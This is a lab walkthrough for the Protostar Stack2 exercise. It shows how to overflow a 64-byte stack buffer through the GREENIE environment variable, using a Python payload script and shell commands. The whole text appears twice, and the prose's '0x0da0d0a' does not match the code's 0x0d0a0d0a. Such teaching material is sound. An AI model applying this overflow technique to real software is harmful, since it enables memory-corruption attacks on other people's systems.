Protostar 0x02 - Stack2
Prev: 0x01 - Stack1
Next: 0x03 - Stack3
This level is again very similar to the previous level, although this time there is an added variable titled "variable," which is initialized with "getenv" by calling some sort of "GREENIE" variable which is not yet set.
We can confirm that this mysterious "GREENIE" variable is not yet set by running the program:
$ ./stack2
stack2: please set the GREENIE environment variable
Looking ahead in the source code, we see that the "GREENIE" variable is copied into "buffer," and then "modified" is checked to see if it equals "0x0da0d0a." Much like the last level, we'll need buffer to contain 64 dummy bytes plus the above requested bytes in "modified" passed in little-endian. However, this time, we'll need to place this into an environment variable named "GREENIE."
Let's again bring stack2 with us to the /tmp folder and craft our Python script:
$ cp stack2 /tmp
$ cd /tmp
$ nano stack2.py
Our Python file:
import struct
buffer = "A" * 64
modified = struct.pack("<I", 0x0d0a0d0a)
payload = buffer + modified
print payload
Now, we just need to set this to an environment variable named "GREENIE." We can do this simply do this by simply stating "GREENIE=`python stack2.py`" and exporting it. Then, we can confirm it worked by calling "printenv" on "GREENIE."
$ GREENIE=`python stack2.py`
$ export GREENIE
$ printenv GREENIE
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Great! Now, since the "stack2" program itself takes care of setting "buffer" based on the "GREENIE" variable, if we run the program we can see if we've accomplished our objective:
$ ./stack2
you have correctly modified the variable
Prev: 0x01 - Stack1
Next: 0x03 - Stack3
Next: 0x03 - Stack3
This level is again very similar to the previous level, although this time there is an added variable titled "variable," which is initialized with "getenv" by calling some sort of "GREENIE" variable which is not yet set.
We can confirm that this mysterious "GREENIE" variable is not yet set by running the program:
$ ./stack2
stack2: please set the GREENIE environment variable
Looking ahead in the source code, we see that the "GREENIE" variable is copied into "buffer," and then "modified" is checked to see if it equals "0x0da0d0a." Much like the last level, we'll need buffer to contain 64 dummy bytes plus the above requested bytes in "modified" passed in little-endian. However, this time, we'll need to place this into an environment variable named "GREENIE."
Let's again bring stack2 with us to the /tmp folder and craft our Python script:
$ cp stack2 /tmp
$ cd /tmp
$ nano stack2.py
Our Python file:
import struct
buffer = "A" * 64
modified = struct.pack("<I", 0x0d0a0d0a)
payload = buffer + modified
print payload
Now, we just need to set this to an environment variable named "GREENIE." We can do this simply do this by simply stating "GREENIE=`python stack2.py`" and exporting it. Then, we can confirm it worked by calling "printenv" on "GREENIE."
$ GREENIE=`python stack2.py`
$ export GREENIE
$ printenv GREENIE
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Great! Now, since the "stack2" program itself takes care of setting "buffer" based on the "GREENIE" variable, if we run the program we can see if we've accomplished our objective:
$ ./stack2
you have correctly modified the variable
Prev: 0x01 - Stack1
Next: 0x03 - Stack3